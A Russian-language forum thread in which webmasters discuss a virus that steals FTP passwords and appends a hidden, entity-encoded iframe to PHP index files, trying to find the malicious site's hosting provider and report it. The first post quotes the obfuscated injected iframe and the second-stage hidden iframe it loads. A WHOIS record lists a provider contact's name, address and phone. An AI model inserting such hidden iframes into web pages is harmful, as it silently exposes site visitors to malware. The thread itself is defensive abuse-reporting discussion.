Форум Сайтостроение Хостинг

Как узнать хостера сайта?

B5
На сайте с 16.05.2007
Offline
2
bb5000
1387

Есть сайт alltraff.ru, который участвует в работе одного вируса. Суть вируса: распространяется по сети, тырит пароли от фтп, если находит на фтп index.php или auth.php, то добавляет в конец строку:

<iframe src='&#104&#116&#116&#112&#58&#47&#47&#97&#108&#108&#116&#114&#97&#102&#102&#46&#114&#117&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112' width='1' height='1' style='visibility: hidden;'></iframe>

В ней происходит запрос к файлу alltraff.ru/iframe.php, который возвращает:

<iframe src='http://google-counter.com/in.cgi?5' width='1' height='1' style='visibility: hidden;'></iframe>

ДНСники у сайта ns1.lexhost.info и ns2.lexhost.info, т.е. сервер чувак арендует. Как узнать кто ему доступ в инет предоставляет, чтобы обрубить нахрен всю эту потеху?

LineHost
На сайте с 20.01.2007
Offline
339
LineHost
#1

Гонконг, врятли что то выйдет :)

Хотя правила говорят о том, что они не желают иметь дело с незаконными действиями. Может стоит написать... 

inetnum:      58.65.232.0 - 58.65.239.255

netname:      HOSTFRESH

descr:        HostFresh

descr:        Internet Service Provider

country:      HK

admin-c:      PL466-AP

tech-c:       PL466-AP

status:       ALLOCATED PORTABLE

mnt-by:       APNIC-HM

mnt-lower:    MAINT-HK-HOSTFRESH

mnt-routes:   MAINT-HK-HOSTFRESH

remarks:      Please send Spam & Abuse report to

remarks:      abuse@hostfresh.com

remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks:      This object can only be updated by APNIC hostmasters.

remarks:      To update this object, please contact APNIC

remarks:      hostmasters and include your organisation's account

remarks:      name in the subject line.

remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed:      hm-changed@apnic.net 20060612

changed:      hm-changed@apnic.net 20060613

changed:      hm-changed@apnic.net 20061018

source:       APNIC



person:       Piu Lo

nic-hdl:      PL466-AP

e-mail:       ipadmin@hostfresh.com

address:      Unit 2001, 20/F, New Tech Plaza,

address:      34 Tai Yau Street, San Po Kong, KLN

address:      Hong Kong

phone:        +852-35979788

fax-no:       +852-24522539

country:      HK

changed:      ipadmin@hostfresh.com 20070710

mnt-by:       MAINT-HK-HOSTFRESH

source:       APNIC
SERV.LT - Стабильные услуги хостинга, KVM VPS в Литве, Франции. (https://www.serv.lt/ru/vps/kvm/) Недорогие выделенные серверы (https://www.serv.lt/ru/dedicated-lt/) в Литве.
hcenter.ru
На сайте с 25.01.2006
Offline
75
hcenter.ru
#2
bb5000:
Есть сайт alltraff.ru, который участвует в работе одного вируса. Суть вируса: распространяется по сети, тырит пароли от фтп, если находит на фтп index.php или auth.php, то добавляет в конец строку:
В ней происходит запрос к файлу alltraff.ru/iframe.php, который возвращает:
<iframe src='http://google-counter.com/in.cgi?5' width='1' height='1' style='visibility: hidden;'></iframe>

ДНСники у сайта ns1.lexhost.info и ns2.lexhost.info, т.е. сервер чувак арендует. Как узнать кто ему доступ в инет предоставляет, чтобы обрубить нахрен всю эту потеху?

Также можете написать абузу регистратору домена, для последующего блокирования

B5
На сайте с 16.05.2007
Offline
2
bb5000
#3

Спасибо, всем написал. НАУНЕТ вроде обещали разобраться....

A
На сайте с 03.07.2007
Offline
9
abakan
#4

Абузы абузы,да по больше

Хостинг в USA (http://www.3fn.net)
AM
На сайте с 09.01.2007
Offline
467
AndyM
#5

На этом же хостинге сегодня засветилась фальшивая страница для вытягивания паролей к яндекс деньгам.

Так что хостинг скорее всего просто прикидывается добрым и пушистым.

Я уже в файерволе закрыл весь их диапазон адресов, чтобы спокойнее было.

[Удален]
#6

давайте все напишем регистратору и хостеру, быть может от большого кол-ва писем будет результат. ;)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий